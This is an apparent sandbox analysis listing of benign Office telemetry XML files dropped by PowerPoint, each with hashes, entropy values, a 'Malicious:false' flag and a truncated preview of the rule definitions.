                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704050" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Lens" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLens" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeInfo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1392
                                                                                                                              Entropy (8bit):4.890484382283006
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9oWD2uct1k3BNjXMi+EsdnKE+2h6wl/Ffox4dVXHj:c2G2ucteNjXMzbdKshBdfLXj
                                                                                                                              MD5:159F78A647A1A88E948F2C86FD139740
                                                                                                                              SHA1:1C57A440FFC4107477F457E3DD17EC61CCBD9D24
                                                                                                                              SHA-256:EA3E5405E34AE8C26D60A1B771C54A3BF584A6845E9B405919680B4573B7F656
                                                                                                                              SHA-512:1CE2C45657991ADEEC1FD2CF7A07DC41ADA361E75D2BBB7F6432B5AA33DB56FED8C06C2DBFE6451FBF597C4E737DF06065AB81F0BE064D3AAF18FC228744E138
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704051" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Lens.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenLens" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1361
                                                                                                                              Entropy (8bit):4.853437171089294
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9QcaDj2uMt1k3BNjXMi+EsdnKE+2h6wl/FfjOLzW:cCc6j2uMteNjXMzbdKshBdbOLzW
                                                                                                                              MD5:2EB1BE5B405D6C20F0BDD5F88F456FF5
                                                                                                                              SHA1:4897036F6EC16977E2532F8530C483052EF6CABC
                                                                                                                              SHA-256:6AB904B21B2C83DEC84A380210941569623EBE9D7DC35A3381BB5F4A991960BB
                                                                                                                              SHA-512:F0F825A3C5D4F4984230FA2FB66A76ACB1859A35B432759E7FF1B5FCEF49AB3655C294BCFDCF714763A19CD82E1CE274FECBB6D036C591D458671F3A95BB7210
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704100" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Privacy" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPrivacy" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTy
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):4.88763297443542
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9QviDj2uct1k3BNjXMi+EsdnKE+2h6wl/FfjOLzW:cCvij2ucteNjXMzbdKshBdbOLzW
                                                                                                                              MD5:741C697019FAF642C271D48B3152C103
                                                                                                                              SHA1:B2D476DFE45A9BA9F45B60645D8CE8283CC85D27
                                                                                                                              SHA-256:94ADD8B3467767795B062E554EC24B395641436ED6C9C61E947F908DF92DB0BB
                                                                                                                              SHA-512:37FD72A476E07ABE872841C2AF631B47692FA61416E6C06AA13B32DABA6F755015383A0115681CC6E09F31463E4A40118438D1C1850366D29EC0DDB908692E40
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704101" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Privacy.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenPrivacy" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1361
                                                                                                                              Entropy (8bit):4.863515036936551
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9Qt4jD82YBuMt1k3BNjXMi+EsdnKE+2h6wl/Ffg3i9r9:cCt+2uMteNjXMzbdKshBdag
                                                                                                                              MD5:8C161F15E9201A91FEA611C248925EC2
                                                                                                                              SHA1:774BCD74AA6EA9DBA80E9E0E94C393BF2ABFDEA5
                                                                                                                              SHA-256:B46ED3FB8B9BFA797A0FF0F5B0C7498C6DC8546069E38D521CE8E59E4C282EAA
                                                                                                                              SHA-512:C2BD900358753F9739051056F65D45013077527041D7B7B71051BA8695A5A0B5C663235733A3B94EA327A21C696DB5E760FBC3C8439868D5866B8D1DE9346E22
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704150" V="0" DC="SM" EN="Office.Telemetry.Event.Office.AppDocs" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAppDocs" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTy
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):4.898410545870133
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9QqWD82YBuct1k3BNjXMi+EsdnKE+2h6wl/Ffg3i9r9:cCqG2ucteNjXMzbdKshBdag
                                                                                                                              MD5:51CB4C96AEA134C37512CC4054BDAD39
                                                                                                                              SHA1:EAE365A38489E8D6946D2F3C2081C20B3713D1AD
                                                                                                                              SHA-256:0B91234B8F45EBFC03B3F7656F25CC320F616180514C8368F2154DEE6ADFCBDD
                                                                                                                              SHA-512:9100F3A88255E3EE56B9995E91D029E6AF5FCB068CF148E05CACB59B2C270EB8EE48030A7BC111448BDFFFC2DDD6A3CFD6B566086B3CAF68775576058BA8FC33
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704151" V="0" DC="SM" EN="Office.Telemetry.Event.Office.AppDocs.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAppDocs" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1379
                                                                                                                              Entropy (8bit):4.864383829099071
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9QzDluMt1k3BNjXMi+EsdnKE+2h6wl/FfIH:ci/luMteNjXMzbdKshBdAH
                                                                                                                              MD5:566827AF91A5B4B56E549962CE94456B
                                                                                                                              SHA1:A59ED5BB9B2EC70CFD5877B0B13499D5871AD557
                                                                                                                              SHA-256:278E94C0AEAE3488C7B0DBBC12F879804A45124AC74F5D3AF1C327D714916BC2
                                                                                                                              SHA-512:C8DB4187CB5631777466EEA00EF228102B49740DD535D857F6790B51A93E41DCCE854D50A8C4F02E3B2ECDEF4D538C59B3C2C7ED5F7EFE5F7AE43AB69F7BC435
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704200" V="0" DC="SM" EN="Office.Telemetry.Event.Office.CommandExecution" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCommandExecution" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1416
                                                                                                                              Entropy (8bit):4.8984573728935095
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9DBDluct1k3BNjXMi+EsdnKE+2h6wl/FfIH:clxlucteNjXMzbdKshBdAH
                                                                                                                              MD5:B11B43352E13CDC0B66DA5E6F394D72A
                                                                                                                              SHA1:D8458DB86F0C92B7296650A158AB377DE4744409
                                                                                                                              SHA-256:2A399A6E39E0F33C0B355A4F6986E7250DD20AD4CEF5BD3605BF88009158C82D
                                                                                                                              SHA-512:6B3DB204E34464B6BE1FD9B5B729C70996B37622BFC47524B503D2789EB3A218BC1F92E3A53229AF246866476250BCFB95D4735A8C005D3DC64B862FE7E303E5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="704201" V="0" DC="SM" EN="Office.Telemetry.Event.Office.CommandExecution.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCommandExecution" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContract
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):480
                                                                                                                              Entropy (8bit):5.140990380367097
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd92KU3b03CMgZYAQier8lV16jnfEtNO2su:2d9hU3Xgr8Pun8j
                                                                                                                              MD5:75FBAA9EDF3A3AB4269BB70E46B0E9E7
                                                                                                                              SHA1:F88290AB65E11898E895A0829CA42A4F0395E9B5
                                                                                                                              SHA-256:5CE9599ECF96CB3793A8188B25496C7360150894AADA3B87FC50917AF9B5D068
                                                                                                                              SHA-512:2C79A12C02A2ED3906F2A0B496223453DCC13923037746AF4FDD7CE6B1ADB9B173D4D180460A92FD3B2C2E44CB3AC5942C9F4FC725C10E64B9D442606AB3BED7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70500" V="0" DC="SM" EN="Office.Help.HelpTaskPaneSessionTime" ATT="f0ef8c1d59b54013a78c8cce0b75bb44-d4a21f0a-ff29-4a4c-81e7-bc7f69607cc5-7242" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhgtp" />.. </S>.. <C T="FT" I="0" O="false" N="Time">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U8" I="1" O="false" N="State">.. <S T="1" F="Event" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3699
                                                                                                                              Entropy (8bit):3.446203843540715
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9cuXRFtzRFkqRFnzRFBxRFTzRFMjDh1vPcpsJpDYpZ11uMTX0oG:cWuXRzRdR9RhR5RKhuMf
                                                                                                                              MD5:4A0B32F72465C7F441695B4F6471F522
                                                                                                                              SHA1:FC0983B38537C41006E9EF1634ACB2012F8621DA
                                                                                                                              SHA-256:1C839542EBC88E2F2EAF8E31EB7B10EDDBF187617F28614ACA58E4481976B9CE
                                                                                                                              SHA-512:CAC42FB8B686236F4584D848B546163028BF203038FC4468917232CB6125AC1532E4CA50DDB114840375E850AE81D94389A755812B2E580BA69678FB67FB78E0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70502" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <UCSS T="1" C="Scope Summary" S="Medium" />.. <F T="2">.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Tag" />.. </L>.. <R>.. <V V="18638042" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Tag" />.. </L>.. <R>.. <V V="18638044" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </L>.. <R>.. <O T="OR">.. <L>.. <O T="EQ">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1966
                                                                                                                              Entropy (8bit):4.713212028693152
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9HFQc11mbU3Xm30chKSmuyPjRF4qLPD3RfT0cV0sOczioc8cg:c9FQI1aoXA0q1muybRF4q90w0q59j
                                                                                                                              MD5:3C3BB75D74E8B4B3EFD3C12338E76263
                                                                                                                              SHA1:D635D8756609B155E312D02F7FA05D1666FE3ADD
                                                                                                                              SHA-256:17A9DDC4D1503AE4ED300BE241441610CF9A3CBA0B2F5BB84A2ED14CF2C6FF9C
                                                                                                                              SHA-512:1B78F6CB36C79ADF49CE6ECC8A424FBA6CF07F470FEB80522564C3B4860B997C356E269B362D88B33AD3B30C4173DCFB6566642FA378FCC2A7ECF7E6A36B1FEC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70503" V="0" DC="SM" EN="Office.Help.Gen1ActivityAggregatedSuccessCountWithTag" ATT="f0ef8c1d59b54013a78c8cce0b75bb44-d4a21f0a-ff29-4a4c-81e7-bc7f69607cc5-7242" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ActivitySuccess" />.. </RIS>.. <S>.. <R T="1" R="70502" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="3" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <TI T="3" I="10min" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <G I="true" R="TriggerOldest">.. <S T="2">.. <F N="5" />.. <F N="6" />.. <F N="9" />.. <F N="10" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="CollectionStartTime">.. <A T="MIN">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="FT" I="1" O="false" N="CollectionEndTime">.. <A T="MAX">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="W" I="2" O="false" N="Act
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2036
                                                                                                                              Entropy (8bit):4.6821367680074895
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d92FQc1zU3Xm30cYISmuyPiKpFYhLPD3RfT0cTqC8vwfu+cjcg:c4FQIzoXA0FmuyPFYh900qLiWj
                                                                                                                              MD5:31059893128249856A8F8A6CBEC5FF17
                                                                                                                              SHA1:4F0E9AA30FA84098E3BE9572DA53D442CA10A0D1
                                                                                                                              SHA-256:25666E3E2F1F78D5C5A0B998D9118831021E152F5E2AC1CBECEA45C5F48D7B44
                                                                                                                              SHA-512:E785BA4EE1BFAD10187211F60E3EBDC2FA4993D816F79BD06C36E77CDBA754E372174685F364CD3B263140EB832F41754566540CD63C5B91D51922842B5F9B5A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70504" V="0" DC="SM" EN="Office.Help.Gen1ActivityAggregatedFailureCount" ATT="f0ef8c1d59b54013a78c8cce0b75bb44-d4a21f0a-ff29-4a4c-81e7-bc7f69607cc5-7242" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ActivityFailure" />.. </RIS>.. <S>.. <R T="1" R="70502" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="3" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </F>.. <TI T="3" I="30s" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="2">.. <F N="4" />.. <F N="5" />.. <F N="6" />.. <F N="9" />.. <F N="10" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="CollectionStartTime">.. <A T="MIN">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="FT" I="1" O="false" N="CollectionEndTime">.. <A T="MAX">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="W" I="2" O="false" N="ActivityName">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2739
                                                                                                                              Entropy (8bit):3.5524500936112124
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dSLCCw6YiZys1OrTuiReWuUjO8PROt0FuoqfOi9w8hWD4:cgbai3OHuKesP1dD4
                                                                                                                              MD5:D47112F111C28F2F8DDBF45FD0144286
                                                                                                                              SHA1:F5F6B49ABA23F550DBB02931B3D5C2C3CD703D9A
                                                                                                                              SHA-256:CCCB616EAFD1D6BFF3EAFDE3E361498975726661B671A9AFBBBF053F7F72EDF7
                                                                                                                              SHA-512:83B7CA629FA40A40EF1D31232F4EC56D4D293C7EBE7F67081D54C923D67419DC67D5FA22040755404D4844C2FDC433C35A8A05E6D08E1D52C5A722E7026018C1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="840000" V="1" DC="SM" EN="Office.Floodgate.Client.CampaignExperimentLoad" ATT="d526a9052e444f1d8706529ef111b101-1a23544e-ef74-4a87-9979-78386cb3c5e6-6762" SP="CriticalExperimentation" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="920pg" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="AND">.. <L>.. <O T="AND">.. <L>.. <O T="NE">.. <L>.. <S T="1" F="CampaignId" />.. </L>.. <R>.. <V V="8a42827d-29d2-473e-998e-3217724c5b68" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="NE">.. <L>.. <S T="1" F="CampaignId" />.. </L>.. <R>.. <V V="c3b31d20-81f5-49ee-8c43-b12d3f898c06" T="W" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):689
                                                                                                                              Entropy (8bit):5.139406679616707
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSGMd/RZUCw6DEi3FerJMfUIdLWtlAGnp9l/+b4RCffE2NO2su:2dSFrUCw6Yi3wrJ/kK1FCnEG
                                                                                                                              MD5:891964456DC56DA862EC2C3D6F08E59A
                                                                                                                              SHA1:3BCEE1F0E28162B84A83A6E682A877867B30C1E5
                                                                                                                              SHA-256:FE695C7F1A05ABC6E80CB3C417032E39CAD9BAB6D3486C4B68E047789B0D7302
                                                                                                                              SHA-512:3B5F43D02327FF094F984532E7B25DDD8359B7534B9A3F193CB869FEC48E11F911063DE1344A7DC2AAC3F5747CB56D6A68CC95C2D2F686222DBEC32404067F6B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="840001" V="0" DC="SM" EN="Office.Floodgate.GetDecisionForAction.LastMileCheck" ATT="d526a9052e444f1d8706529ef111b101-1a23544e-ef74-4a87-9979-78386cb3c5e6-6762" T="Upload-Medium" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="82pu4" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyId">.. <S T="1" F="ActionId" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Decision">.. <S T="1" F="Decision" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="ChannelType">.. <S T="1" F="ChannelType" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1032
                                                                                                                              Entropy (8bit):4.971711898879209
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dS87Cw6YiZmZrbmux+agGik3CD81gGJAl:cSaicfmuI58gGJAl
                                                                                                                              MD5:CEA0F586D250A26787D5E9FFAD3DB1CF
                                                                                                                              SHA1:118830963080E8CAF28D7F664F0F23B018CBCB3B
                                                                                                                              SHA-256:FA8B5A1D0881EF3E48433CEE79F1831AA77AFFF0484771D4EC27156049C9C011
                                                                                                                              SHA-512:613852F9CAF6A1EC7D3B780AB0665F748FFE16890FB8940CDBC1E8A6A2B42798A1F17170257B06AE93BAB795087EF9AD6C081EE546F7F0CEA42F374E16518AAF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="840002" V="1" DC="SM" EN="Office.Floodgate.SurveyTracked" ATT="d526a9052e444f1d8706529ef111b101-1a23544e-ef74-4a87-9979-78386cb3c5e6-6762" SP="CriticalBusinessImpact" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b9q72" A="c2gya c2g72 dciyl" />.. <F T="2">.. <O T="GT">.. <L>.. <S T="1" F="GovernedChannelType" />.. </L>.. <R>.. <V V="2" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="2" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyId">.. <S T="2" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="UniqueId">.. <S T="2" F="UniqueId" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="GovernedChannelType">.. <S T="2" F="GovernedChannelType" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="PrimaryPriority">.. <S T="2" F="PrimaryPriority" M="Ignore" />.. </C>.. <T>.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1065
                                                                                                                              Entropy (8bit):4.032222543430035
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHddljeIYAQXerHN+u/lOaNe8tNH/M//HTLJ5eNX/c//aNezPNuHa3/8//QGJuW:2ddljrJrH8uXhHwLKTQPbbFzPc
                                                                                                                              MD5:764B6A73002773B0074D65927E91452A
                                                                                                                              SHA1:D20C23DC2F7A8279CC6D91E3F15A7E584AE39049
                                                                                                                              SHA-256:9369795916261DF288E70C07BD2885BDE699083052EADE59D67B3E45FFBE435F
                                                                                                                              SHA-512:2B4D2BC04413039023526FC1B4980692B00B25D4D490825C08748EC22ADC6EE35D42EAE3EEB06A391DFB62C6D5191C9CE85AE5427859F9ECC3192F9B27495FC7
                                                                                                                              Malicious:false
